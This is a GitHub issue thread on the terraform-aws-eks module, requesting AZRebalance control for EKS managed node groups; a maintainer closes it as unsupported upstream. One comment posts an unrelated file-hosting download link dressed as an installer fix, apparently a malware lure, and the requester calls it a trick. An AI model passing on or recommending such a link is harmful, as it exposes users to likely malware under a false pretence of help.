### ISSUE TITLE
Support AZRebalance for ASG when using eks_managed_node_groups

### ISSUE THREAD

**Issue by commodity729** [terraform-aws-modules/terraform-aws-eks#3149]
## Is your request related to a problem? Please describe.
AZRebalance is not available when using eks_managed_node_groups 

## Describe the solution you'd like.
Support AZRebalance for ASG when using eks_managed_node_groups

## Describe alternatives you've considered.
Manually enable this for ASG

## Additional context
Not really sure the reason behind it, but I don't see anything related in module code when it comes to control suspended processes. In my case I need AZRebalance to be specifically disabled, so because your module does not support it, I had to enable this manually.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by commodity729** [comment]
> try this https://gofile.io/d/xx select the desired compiler in the installer

cheap trick

**Comment by commodity729** [comment]
It is supported by asg, why it cannot be supported by terraform module?

**Comment by bryantbiggs** [comment]
closing for now - once this functionality is supported by EKS managed node groups then we can support it here as well
